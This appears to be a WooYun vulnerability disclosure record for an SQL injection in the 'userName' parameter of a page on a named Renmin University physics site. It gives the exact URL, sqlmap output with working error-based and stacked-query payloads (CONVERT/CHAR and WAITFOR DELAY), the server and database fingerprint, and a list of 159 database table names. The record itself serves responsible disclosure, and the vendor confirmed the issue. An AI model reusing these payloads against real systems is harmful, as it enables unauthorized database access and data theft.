WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online ------------------------ http://drop.zone.ci/
2015-11-30: Details have been sent to the vendor and are awaiting vendor handling
2015-12-01: Vendor has confirmed; details disclosed to the vendor only
2015-12-11: Details disclosed to core white hats and experts in related fields
2015-12-21: Details disclosed to regular white hats
2015-12-31: Details disclosed to intern white hats
2016-01-15: Details disclosed to the public
http://eemd.phys.ruc.edu.cn/LiveFiles/Pages/Inner/count.aspx?ModuleType=Count&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl08&userName=111
Affects 17 databases:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: userName (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: ModuleType=Count&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl08&userName=111' AND 5013=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (5013=5013) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(107)+CHAR(113))) AND 'ckja'='ckja

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: ModuleType=Count&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl08&userName=111';WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: eemd
[159 tables]
+--------------------------------+
| ask_Ad |
| ask_Announcement |
| ask_Answers |
| ask_Catalog |
| ask_Configuration |
| ask_CreditRule |
| ask_CreditRuleLog |
| ask_Expert |
| ask_Links |
| ask_Question |
| ask_UserGroup |
| ask_Users |
| ask_Votes |
| b2c_Ad |
| b2c_Advertisement |
| b2c_Brand |
| b2c_Category |
| b2c_CategoryGroup |
| b2c_Configuration |
| b2c_ContentGroup |
| b2c_ContentModel |
| b2c_GoodsLink |
| b2c_GoodsPhoto |
| b2c_GoodsType |
| b2c_Log |
| b2c_RelatedField |
| b2c_RelatedFieldItem |
| b2c_Shop |
| b2c_Star |
| b2c_StarSetting |
| b2c_StlTag |
| b2c_Supplier |
| b2c_SystemPermissions |
| b2c_Tag |
| b2c_TagStyle |
| b2c_Template |
| b2c_TemplateMatch |
| b2c_UserGroup |
| b2c_Users |
| bairong_Administrator |
| bairong_AdministratorsInRoles |
| bairong_Cache |
| bairong_Card |
| bairong_CardType |
| bairong_Config |
| bairong_ContentModel |
| bairong_Count |
| bairong_Digg |
| bairong_IP2City |
| bairong_Log |
| bairong_Module |
| bairong_PayRecord |
| bairong_Payment |
| bairong_PermissionsInRoles |
| bairong_Roles |
| bairong_SSOApp |
| bairong_TableCollection |
| bairong_TableMatch |
| bairong_TableMetadata |
| bairong_TableStyle |
| bairong_TableStyleItem |
| bairong_Tags |
| bairong_UserAddCard |
| bairong_UserBinding |
| bairong_UserConfig |
| bairong_UserConsume |
| bairong_UserCreditsLog |
| bairong_UserMessage |
| bairong_UserType |
| bairong_Users |
| bairong_Vote |
| bairong_VoteIPAddress |
| bairong_VoteItem |
| bbs_Ad |
| bbs_Announcement |
| bbs_Attachment |
| bbs_AttachmentType |
| bbs_Configuration |
| bbs_CreditRule |
| bbs_CreditRuleLog |
| bbs_Face |
| bbs_Forum |
| bbs_Icon |
| bbs_Identify |
| bbs_KeywordsCategory |
| bbs_KeywordsFilter |
| bbs_Link |
| bbs_Navigation |
| bbs_Online |
| bbs_Permissions |
| bbs_Poll |
| bbs_PollItem |
| bbs_PollUser |
| bbs_Post |
| bbs_Report |
| bbs_Thread |
| bbs_ThreadCategory |
| bbs_UserGroup |
| bbs_Users |
| liveserver_Activity |
| liveserver_BlogCategory |
| liveserver_BlogContent |
| liveserver_Comment |
| liveserver_Configuration |
| liveserver_Favorite |
| liveserver_Friends |
| liveserver_Message |
| liveserver_MyWeb |
| liveserver_PhotoContent |
| liveserver_PhotoContentsInSets |
| liveserver_PhotoSet |
| liveserver_Rss |
| liveserver_Tag |
| liveserver_UserContent |
| liveserver_Users |
| liveserver_Visitors |
| liveserver_Word |
| siteserver_Ad |
| siteserver_Advertisement |
| siteserver_Comment |
| siteserver_Configuration |
| siteserver_Content |
| siteserver_ContentGroup |
| siteserver_GatherDatabaseRule |
| siteserver_GatherFileRule |
| siteserver_GatherRule |
| siteserver_InnerLink |
| siteserver_Input |
| siteserver_InputContent |
| siteserver_JobContent |
| siteserver_Log |
| siteserver_Machine |
| siteserver_MailSendLog |
| siteserver_MailSubscribe |
| siteserver_MenuDisplay |
| siteserver_Node |
| siteserver_NodeGroup |
| siteserver_PagePermissions |
| siteserver_PhotoContent |
| siteserver_PublishmentSystem |
| siteserver_RelatedField |
| siteserver_RelatedFieldItem |
| siteserver_ResumeContent |
| siteserver_SeoMeta |
| siteserver_SeoMetasInNodes |
| siteserver_Star |
| siteserver_StarSetting |
| siteserver_StlTag |
| siteserver_SystemPermissions |
| siteserver_TagStyle |
| siteserver_Task |
| siteserver_TaskLog |
| siteserver_Template |
| siteserver_TemplateMatch |
| siteserver_TemplateRule |
| siteserver_Tracking |
| siteserver_UserContent |
| siteserver_UserGroup |
| siteserver_Users |
+--------------------------------+
Severity: Medium
Vulnerability Rank: 6
Confirmed at: 2015-12-01 09:12
Confirmed; the relevant staff have been notified to handle it.
None yet